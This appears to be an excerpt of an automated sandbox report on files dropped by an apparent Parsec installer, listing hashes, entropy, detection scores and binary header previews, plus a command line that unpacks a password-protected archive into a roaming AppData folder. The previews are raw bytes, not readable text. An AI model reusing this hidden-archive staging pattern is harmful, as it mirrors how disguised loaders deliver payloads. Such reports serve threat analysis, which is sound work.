                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):1841664
                            Entropy (8bit):6.286587259470902
                            Encrypted:false
                            SSDEEP:24576:E8sHeHKHplfu94i55tbhris2CCEnWaWBvYyozGUIjnRnU:E8Y/Q94iZNrP2t0ZyyIjnRnU
                            MD5:4E35A902CA8ED1C3D4551B1A470C4655
                            SHA1:AD9A9B5DBE810A6D7EA2C8430C32417D87C5930C
                            SHA-256:77222E81CB7004E8C3E077AADA02B555A3D38FB05B50C64AFD36CA230A8FD5B9
                            SHA-512:C7966F892C1F81FBE6A2197BD229904D398A299C53C24586CA77F7F657529323E5A7260ED32DA9701FCE9989B0B9A2463CD45C5A5D77E56A1EA670E02E575A30
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..07.sc7.sc7.scA-.c6.scA-.c<.sc7.rcR.scA-.c.sc!.wb4.scA-.c..sc..pb0.scA-.c6.scA-.c6.scA-.c6.scRich7.sc................PE..d....\.d.........." ................pe....................................................`..........................................-.......$..x................1...............!...................................................................................text...]........................... ..`.rdata...^.......`..................@..@.data........0......."..............@....pdata...1.......2...(..............@..@.rsrc................Z..............@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):557056
                            Entropy (8bit):6.204396774559151
                            Encrypted:false
                            SSDEEP:6144:mE7cV3iwbAFRWAbd4nf0H05yqE6Hl0ChW0+ksllAXBu0lWGWUJJQ4t0BHQQf+L+G:d7a3iwbihym2g7XO3LWUQfh4Co
                            MD5:9A1DD1D96481D61934DCC2D568971D06
                            SHA1:F136EF9BF8BD2FC753292FB5B7CF173A22675FB3
                            SHA-256:8CEBB25E240DB3B6986FCAED6BC0B900FA09DAD763A56FB71273529266C5C525
                            SHA-512:7AC1581F8A29E778BA1A1220670796C47FA5B838417F8F635E2CB1998A01515CFF3EE57045DACB78A8EC70D43754B970743ABA600379FE6D9481958D32D8A5AA
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@...........................................`.....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):120832
                            Entropy (8bit):6.452660436286688
                            Encrypted:false
                            SSDEEP:3072:VUcCdrEZyY755X5YTC81grxQUfZtPrFD:UiyS5JYN1grxQUfZt
                            MD5:267A42F3D8CDF6FCE02BFDA76A724120
                            SHA1:9A17457DAD529419715AC6F092052FF7D1F01469
                            SHA-256:907947FCA16FAB90430F56259EB81EF0609AAAC8166BC174D129945CE78E4A5E
                            SHA-512:64C4D0E54C1D633EF3F7E31B77EA74975FA14A603E1F9590890A9741D23B6430EFC6DD2E8ADF2C0B0E55F8F2B58DF974708A8613198DCB8AD38566B37E579990
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..Eo..Eo..E{..Dc..E{..Dm..Eo..E...E{..D|..E{..Dn..E{..Dw..E{.LEn..E{..Dn..ERicho..E........PE..L....X.Y...........!...............................e................................A.....@A............................).......................................4....F..T...........................(...................|............................text............................... ..`.data...X...........................@....idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):3.3828878559559703
                            Encrypted:false
                            SSDEEP:96:vKiQPIPmWlhsyNcKXWT6w5qNeWhOWwCP:Ci5PmR+eWhOW
                            MD5:E27BB683A96D3C2338FB46385AB7F2FB
                            SHA1:FE4B1A347EE4B9C55D4A53C24C3FFD51F2547CFD
                            SHA-256:9B47A5D829F7045AF99FFD1F6380870BCE47505B41B9CBA88E94C7FC15B8C7E6
                            SHA-512:7EB8E4AF5F53D1C05F04285CAD928D2FB838E2EA7C6BCE261B668EED6C2E5A9E59ACF5213478A007C9C1D79FC291CE1858151B7E92DD6CF0E0EB4E3EF1043F4A
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...}1u............!......................... .....R.........................@............@E............................P............ .......................0..........T............................................................................data...G........................... ..`.rsrc........ ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):356864
                            Entropy (8bit):6.703452536404214
                            Encrypted:false
                            SSDEEP:6144:a/SEW2qJHtVqYEJ6pdMZT6KWm1xA+Mko22Anui5j:kI9tV3EMpdQGRwA+92Uj
                            MD5:7C220C7186368E299FA81FBFF8290064
                            SHA1:F18BB3A1ADF29F8CF556B4D02D44F668537964F6
                            SHA-256:742395A3BBB5700067955BA70E29BE33C45C35A25705A071B472FDBBB1523070
                            SHA-512:48CA2D90714E071357B8CDAE2883633F78964D85ED1C45883794A42F160B754110050E7D5706F7C359448D45F2B8627CF2999D4351302A7073F8D930C101C50B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6@..r!..r!..r!..{Ys..!..fJ.c!..r!.. ..fJ.a!..fJ.x!..fJ.v!..fJ..s!..fJ.[!..fJ..s!..fJ.s!..Richr!..........................PE..L...h>.............!.....|................................................................@A.............................................p...................p..TI.. m..T............................ ..........................@....................text....{.......|.................. ..`.data...T...........................@....idata..^0.......2..................@..@.didat..............................@....rsrc....p.......r..................@..@.reloc..TI...p...J...(..............@..B................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):888832
                            Entropy (8bit):6.658891755289535
                            Encrypted:false
                            SSDEEP:12288:qq+D5IECD3N0TU++ekdhBHUESG+IAafpR2hZz8PC2CQh3Y+EkwVWFvhXX:fECD9j++ekR0JG5AaBmzqhpY+ELUhH
                            MD5:5E7C062BDE54ED88A639A889A1695318
                            SHA1:3A8548093D0E795FBF5E3C972D1EF28CEA76374D
                            SHA-256:318CA8E2AE5ECDBB0A7E10AE90B317C09D9C425758D530FFD54110CE1121088C
                            SHA-512:4609F791DEF263D03FDB57068B626582437E2598BCF77B68456DD2C2C7FE855FF2E71FF555B313BA0E94FADCDC2DC105DA95DC9E566E11369D5C8AF1A98A3A1B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............uH..uH..uH...H..uH..qI..uH..vI..uH..tH..uH..tI..uH..pI..uH..uI..uH..|I:.uH...H..uH..wI..uHRich..uH................PE..L......=...........!.....R...V...............p...........................................@A........................pa..l......X.......P........................... >..T............................>.......................V.......................text....Q.......R.................. ..`.data....(...p.......V..............@....idata...............d..............@..@.didat..`............|..............@....rsrc...P............~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):398336
                            Entropy (8bit):7.1846894828937105
                            Encrypted:false
                            SSDEEP:12288:E15s2/azNQo8oT1EWDEkO6VzZF9uyHLjlHf:o/2CFPkDVzZF9uyHtHf
                            MD5:3FA8077C9C6A769B3BD88800E818BDF6
                            SHA1:7A1E69172E18831FBA28026BE7A24355354713B5
                            SHA-256:1D1FF5C14D8DD0C0F93A2C3DBFC7369E542DEF86C4E4E21659B847C43420C4C3
                            SHA-512:5C4DACFC5D34940F3ABA62A641398ABEA5CA94622EEFD850F902575A43647CB67CFE4091661ACB3710F242FAE2F6FB0E875D679286ABF6C5F38B0CF8572FE1AE
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F.s..s..s......s...w...s...p..s..r.`.s...r..s...v..s...s..s...z...s.....s...q..s.Rich.s.........................PE..L...S;Y............!................@........0...............................P............@A.........................%............... ..X....................0..`... Z..T....................................................$..@....................text............................... ..`.data........0......................@....idata..............................@..@.didat..............................@....rsrc...X.... ......................@..@.reloc..`....0......................@..B................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):264992
                            Entropy (8bit):6.422639874613466
                            Encrypted:false
                            SSDEEP:6144:4i7RSMUw32CszCxRBL17SxvZiPk7H0FsoTVC7Rr:b9p25z+J7v8H0Fso2Rr
                            MD5:5F5E63F6EB6BADA4051AE5B3ADE35C95
                            SHA1:9925C1A5DD98CC0D24F2DB35E75C6FA3512B6BB0
                            SHA-256:5B40BE2B83DE58C9C787D9E97D218EC3CECECEE30CA884CD7A3B45D60A9F2FD9
                            SHA-512:7835DD94B14286FB55EEADCDF1C675C3674A3AE1F94D5A4DB141D9C08E2423EF70DC18C48FFD1EADEB2BFB37D89E435268D80C4E41DA771E0123AC87BBB1C3A0
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4/W.Z|W.Z|W.Z|^..|u.Z|C.^}X.Z|W.[|..Z|C.[}P.Z|C._}U.Z|C.Y}S.Z|C.Z}V.Z|C.S}r.Z|C..|V.Z|C.X}V.Z|RichW.Z|................PE..L..................!.........|...............................................@.......@....@A........................p.......`...........H............... /... .......'..T...............................................\.......`....................text...-........................... ..`.data...0J.......&..................@....idata..............................@..@.didat..............................@....rsrc...H...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):27648
                            Entropy (8bit):5.776086876326118
                            Encrypted:false
                            SSDEEP:768:vpWhWBPbF7QQWWKmk2sBED0U3bjlkZHp9Tw:0hcR7QQ5C3MH+ZHp9s
                            MD5:D2BC6AE376BA560FD67B402E2A97F4CA
                            SHA1:5F6C77A427921A22F6FDFAC4460F44BCC9A89F83
                            SHA-256:41BACE37D18E89539DDA9846AC0AF6ED4733282B01EE99AD735C1638391BF4C3
                            SHA-512:7B5251FCB069AA90DD178AFBB7F405B4737C75ACDFBB28215FBEF1F92F3BC47C24428542C4DB81E2F7E10D865A04FE4A8D404A88D7CE5D491B7D6E1B6F1C95D2
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xr..<.`A<.`A<.`A5k.A*.`A(xe@=.`A(xc@=.`A(xd@).`A(xa@3.`A<.aA..`A(xi@0.`A(x.A=.`A(xb@=.`ARich<.`A................PE..L....@..................D...P......pJ.......`....@..................................j....@...... ..............................@.......................................T...........................x.......................|Q..`....................text...DB.......D.................. ..`.data...H,...`.......H..............@....idata..8............J..............@..@.didat...............Z..............@....rsrc................\..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):3756821
                            Entropy (8bit):7.999950735502969
                            Encrypted:true
                            SSDEEP:49152:SPX5+ecyESLsnN+9/mWfUrkNI7YXv4o4pZ54jEoET6aH2xIuueh26VmQ9FTdPTfQ:SPpLqm/mwUQNI7Zp8xTw6vRPTbSclMj
                            MD5:ADF5C26373A00E49DFC8B59678A26851
                            SHA1:5E0D3E43187E8652FE6B7E898AD666C2939F3C38
                            SHA-256:D009598D6F687532EB734A222D9C0D7EAA179655F736F7A7DD3A2DCB7FAB4AD7
                            SHA-512:ADA9E3C6A9EB49ADCCDC07D30B1A3994C84DE0C9DF93EC365D2396E0C06472C31A6FE2BBA45930DC2B384DC36FFF7D858F1692DCE6DCF57A8543F7F86CA5D70E
                            Malicious:false
                            Preview:7z..'...{T.b.R9.....%.......5b..a..f..B.._Yw"#g...V.y......Q...~..n...n.y..|.W\.$..{...q.w}v.0...1()%"!....b+...Fs..%.......R..1.zp.>G...^.q..Uo..,..1.J..Q..rWUl...@...*.12.7]Z..>>&b...-..........p......./H..<..K+.d.!.3Q$l..."IZ.$.*.6nV....G..[h0....:.`....p.....8ro........w...M.P.../.<....J.Sb...^!.3WH.*.....r*..'..I@..P....P7..{.mG.;....*f.C..?...z_22.N;^.k...$PS-......&.^.......[*y........f.>.....U{k.t# .......`...w.E.hhh......&cX...gIMvd...o_.*.gAeO.X..J..%......f1W...q.n....4..t"....W?...&.S.E..h...*<....:-.. s..R....IY.......))..(.l....F..{. x%..P..I;I.._KKC..$.."......I.q...9sG(..^..P..F..V9=.....tc..4....-......eB.......xY..,.i.Z..&=W.b.).u7DweL W...5c.}...'e..|.qnJs.R.....*......k...u_*....yV.?).s.bg..D.v...@ka....<..D..\U92`.m......R..Qp.h...H..Q..........'..h..!.......a...P.R...-Lk.n.R...A..[..A..PG.@..=...z>."..[k........P.`9.;..N........*..A-..).fH.s1l..w.H3.w...G.p.p|.Q.n..._.9..D2...tC.^o..Q.W.U.^f.....,..A...+.Y].b%.q.....b.^...$
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):172
                            Entropy (8bit):4.910764249781789
                            Encrypted:false
                            SSDEEP:3:I5PUkh4EaKC5ysLvdFnoNUkh4EaKC5yt0RaStYVSQcYQyXWOUkh4EaKC5yH:IN9aZ5lg9aZ5QwhC4xrO9aZ5U
                            MD5:B510879EFB510DCD9E70B03B2ADC20E5
                            SHA1:3DB6E6E439D5A43A49A7AA198C5141557B312458
                            SHA-256:7830EB1EFCD666AB4D38352A730DE7333D5DBDB12FB3F395121942D740A79CBE
                            SHA-512:28D3F783526982F09F11F3B45D557819E7C353B28E4A7957DE97FC418B31CBE66D99CA7DA7C68BA190CD79C17BAADC3E650D19B2605E7EA04AD9DE91726B172D
                            Malicious:false
                            Preview:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
                            Process:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):20
                            Entropy (8bit):3.8841837197791884
                            Encrypted:false
                            SSDEEP:3:QSM3r9:Hkr9
                            MD5:D2EC38A2F034052124ABC5DE27A0CF08
                            SHA1:198CECE15DDA469855FABACC38041A04626EDA24
                            SHA-256:DCA33C88066644EE5A99AECE0DEE86830AD7811AADDF677E514F4C08AE578CB5
                            SHA-512:7D9859168435276ECDCAFF43906AF949AE9863A11E30D74965E88C64A06D951723DFC1BAD5641474C24FF13079FA7D0142D18B89F88F6FBA7DAC499F1C6D501F
                            Malicious:false
                            Preview:parsec-windows.exe..
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):17408
                            Entropy (8bit):5.099127756403988
                            Encrypted:false
                            SSDEEP:192:lzZ1jWp6XwpkG1ThzQosFRi2gKp8W+YAUtpu1KAgsPzKbMq/YWqB/WcNwGOUf:De9Nhei2gS8W+YAUts1V2oPWqB/WEOU
                            MD5:BE2A0F4DFE1DF0C0A095C05787421510
                            SHA1:521A6F5F4268C0E560075F81760AFED0E22E9C56
                            SHA-256:B46D21E8758624D184A063B2C021AEFFF45CA0C33AECC8840829F16E8E32B43A
                            SHA-512:60955C89F4E56FDA473CF756C04B75B59AFFCF8600380ABA3E12DC41B6E0B370FF04B6320D05FFECBDD7994455796B1CD7DA96BBBCF4948DFE74C3B75974296D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y..m...x..m...u..y..E..m...r..m...x..m...z..m.X.x..m...x..Richy..................PE..L....[*7...........!.................3.......@......................................~n....@A........................ =.......P..x....`..8....................p.......-..T...........................P...@............P...............................text....-.......................... ..`.data........@.......2..............@....idata.......P.......4..............@..@.rsrc...8....`.......:..............@..@.reloc.......p.......@..............@..B................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):21504
                            Entropy (8bit):5.437181553041295
                            Encrypted:false
                            SSDEEP:384:ATE5/wpuI8sgqzptH/b3wGK0LTOefJoJA1FwPWuxWp:NmjppbNlxfJoJALwZe
                            MD5:3417CBAB13CD103B5AEE4D4EF297C240
                            SHA1:2BBBB44DD6592701B749DC352A98DBA7642712F2
                            SHA-256:5BEB57FFFC92BCB5FBD8AFD8B2E09EDAE93E895BB9A4604C010EB377930813AD
                            SHA-512:5A14F422D5E5F292C914D07A083E736B1F33D7CF98C72388F87488C431379FBC70CACB1DC25A97B3887FC35E1E9B7ACF03A9329B355001F7CCAACB0D5CA0F2E3
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;&...G.P.G.P.G.Pv?ZPiG.Pk,.Q~G.Pk,.QrG.P.G.PFG.Pk,.QzG.Pk,.Q|G.Pk,.Q~G.Pk,.Q|G.Pk,6P~G.Pk,.Q~G.PRich.G.P........................PE..L...V.P...........!.....8.......... ........P......................................r.....@A.........................>.......`..........`...............................T...........................p................`.......=..`....................text....7.......8.................. ..`.data........P.......<..............@....idata.......`.......>..............@..@.didat.......p.......H..............@....rsrc...`............J..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):224256
                            Entropy (8bit):6.25795248247157
                            Encrypted:false
                            SSDEEP:6144:5jjuLdC4oe1TV5BwAeK0bT6GkwbQpwsYGGM5:5ja2ev3wAeKAu3OsT5
                            MD5:86C95709715D9EB0ED4BEBC6AF6153C0
                            SHA1:2ED10D1B00C98DB7E265883E03C0A63D422E23B2
                            SHA-256:4A842E92B17A982D98BEEDF5E25B371E2BE3A0D6939A5A256E2B3066D1B53A16
                            SHA-512:180598CA8318CA2DA688740F5BC3C3CB5D684C8E2EAD036E800E77EBF749EBEC50D5D8A76A58166C8A6918D63EDA17DD105A06CAD3FE2AA52EC5E5A80FAF838D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{..y?..*?..*?..*6..*)..*+.+;..*+.+3..*?..*#..*+.+6..*+.+...*+.+#..*+.c*>..*+.a*>..*+.+>..*Rich?..*........PE..L....e..................."...N......0........@....@..................................b....@...... ..........................,S.......p.. .......................h"..P...T............................%...............P..(............................text...x!.......".................. ..`.data........@.......&..............@....idata..2....P.......(..............@..@.rsrc... ....p.......F..............@..@.reloc..h".......$...H..............@..B........................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):88576
                            Entropy (8bit):6.314245127753692
                            Encrypted:false
                            SSDEEP:1536:mw7cep4vTkKL9El0Zsl/0W7f1/D5cigpoFTtOxGtIWo4fv0vwcQ:mLepXKBPW7f1BgmFTt24fKwcQ
                            MD5:EC617981C8A1ECFD4E982DC222D702C4
                            SHA1:08662D14313DF78CD3A62FEDA10673FA61DE93B4
                            SHA-256:8507C144A2C8A734AF66A8BE601B819943F931EF31A5244381DB359AB7714BB1
                            SHA-512:126B30D460DB356AD83C848B18F885032FB7C55483E51D9096BD172839E07FF1063B796BC2E3DFE8596A192AAA9C80D054441F2CAFEBB05F53421CE94F2D6A62
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........OC...C...C...J.W.....W...@...C.......W...F...W...O...W...B...W...N...W..._...W.9.B...W.;.B...W...B...RichC...........PE..L.....I............!..... ...:...... ........0.......................................=....@A........................ /..x...8B..X....p...............................(..T...........................h................@..4....-.......................text............ .................. ..`.data........0.......$..............@....idata.......@.......(..............@..@.didat..$....`.......<..............@....rsrc........p.......>..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):8192
                            Entropy (8bit):3.645665042318358
                            Encrypted:false
                            SSDEEP:96:Orl+urtFDjM60maJGSarulzaYnLakA6wpywK+eXS24eSEWr9wWwMY:Or7bjV3SxzfnLm6wpa5p4qWhwW
                            MD5:29D29296A6532A4964014A3173C91A3A
                            SHA1:0E5CDE29F773F952519EA10DAB24E922962663D7
                            SHA-256:75743713ADAE119D2AFFA85588EECB5415D8975AAF0BE65798CB58FEF1317600
                            SHA-512:DC3D99CBD82B04ED2CBC42256E2C32DC881B45C8DAB16971AC84F35EA8C15CDD7179EB7EBE720B1EC961CC35E341DEF406F280B541498A261736F57399D30F24
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L.....X............!.........................................................@......F.....@.......................................... ..................................8............................................................................text...............................@..@.rsrc........ ......................@..@......X.........T...8...8.........X.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!.......rsrc$02.... ....02.......Z7.CGu.W.9..p~iv....X.........................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):249856
                            Entropy (8bit):6.618708464341655
                            Encrypted:false
                            SSDEEP:3072:nBFO+6Zhxp7sZcX65P/RkReY41OjF92BMoygqvoJYxL5ZcOJDJN6RH6C78:nB4jZ7pehkYY4y7gqvnxlZcEDn6RLw
                            MD5:CB3AF0211D68FF4EC460D2DD89A25E8D
                            SHA1:38D0214D072E8F80AC9EAFF54B8E2D1E3B1042A7
                            SHA-256:FACB0C90EBD99FA9626D1FBA44DB025F737CA13C9E71AFADD60155E7A6AC8E29
                            SHA-512:D387996162EBA673E8A2031DE6701A242AF87469162A215D3034AE80B6C556203E4A100942208D3BB540212377BA5F2BC83B83D931BB9C37D5AF3A3FD8DB9961
